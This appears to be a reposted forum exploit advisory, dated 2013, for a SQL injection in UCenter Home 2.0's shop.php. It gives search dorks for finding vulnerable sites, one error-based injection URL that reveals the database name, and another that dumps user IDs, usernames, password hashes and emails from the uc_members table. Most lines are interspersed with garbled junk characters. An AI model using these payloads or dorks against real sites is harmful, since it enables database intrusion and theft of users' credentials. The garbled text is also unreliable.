4 x& s: m" I5 z" p& n
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ + J: d; {* B9 e/ Z# `) Q6 q7 ^
- {" _) Q2 _2 C
# s6 ^+ z' {$ A) X2 r
. T2 V6 v+ | |% L*/ Author : KnocKout
$ }% Z1 O; G6 k! I& U9 S0 {# ]; ~- L: H6 a$ [5 g$ j
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers 8 _. x$ r E# v' ?
+ A7 }% {3 R7 G H( j7 f*/ Contact: knockoutr@msn.com
j4 j" r& W5 K- T
% }5 c% A+ v' U% W. ?4 }6 x*/ Cyber-Warrior.org/CWKnocKout ! d5 O# E/ Y4 H, c- A5 B8 g
% Z+ d" |$ p2 f$ a0 U
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
# P' A- j1 N, `9 y8 E' u: m' ]6 x: V! E
Script : UCenter Home ) D6 s2 i; X5 ^$ v4 @5 p
$ f1 ^7 [% r" q( X, E: ?, X
Version : 2.0 3 Z9 U4 \ w7 x
) C% u# o1 N( i3 PScript HomePage : http://u.discuz.net/
$ I0 V6 c4 A# F6 O1 J; f$ L* r7 V5 M! y
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 3 s+ X( o4 j. h: x; B% R0 X2 \- C( I
6 u% Y# Y* Y9 i3 B& V+ _Dork : Powered by UCenter inurl:shop.php?ac=view
& m. D2 k% @: f) ~& y0 o
* f, k+ h1 x8 ]Dork 2 : inurl:shop.php?ac=view&shopid=
% p+ v+ L) q3 I' d3 o2 E
0 `; ^2 ]( V( d8 {, L% O0 Q__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== / R2 {$ l. d0 n( J& _0 _8 e
! z; A1 N Q6 }! _* z5 yVuln file : Shop.php 8 w* g! h- ] Y# k' I) H8 i
4 p# D1 N" p1 J k9 t: z' o9 ~8 E
value's : (?)ac=view&shopid=
( j5 T0 e! O, J$ d
3 ] R% Z1 Y3 \, c6 c4 y* o# fVulnerable Style : SQL Injection (MySQL Error Based)
( g( N% ] R7 ]. D- S" _( r, i$ B- b8 X$ L$ c0 t+ w# D0 }
Need Metarials : Hex Conversion 5 y$ i. e2 x! X5 W
: o6 X7 Y0 z2 Z9 W z3 v3 P__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 2 x' |- W/ U+ F+ F; J& p, m+ B
" x3 L4 e. B. r. e( t
Your Need victim Database name.
" J0 o3 \3 {% N5 b, W3 P7 g* u. i% v: _
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 $ W, n/ I3 C k5 ^
1 y d$ D* J/ Y) {1 L2 f.. 6 S. I0 V- N2 J8 o6 t. V
4 ?# G' N& l0 {DB : Okey.
& |' [; i. g* \7 Z- X) B, Q f" O: z" ]) l% [' R& W
your edit DB `[TARGET DB NAME]`
# s1 y% y7 @7 T6 w8 m4 Z' i7 Z- U9 \4 L0 \" ]
Example : 'hiwir1_ucenter'
$ H& ]) _# ~6 t* T6 M# |( k+ p9 g) Q0 X$ v- s
Edit : Okey. 3 Z. m% [1 w7 K4 k8 m* k
2 I1 b `/ R% |3 h6 K: u# c
Your use Hex conversion. And edit Your SQL Injection Exploit..
5 G. R( ~+ ?9 Q/ H( W1 |: `1 k" a5 h# }- |/ E' i
: [5 h0 P3 v! ?* w8 \) w4 @, F' Y
- y8 A2 z2 [0 Z% [Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
2 l7 M) z a: s+ T |
发表于 2013-2-27 21:31:31
收藏
支持
反对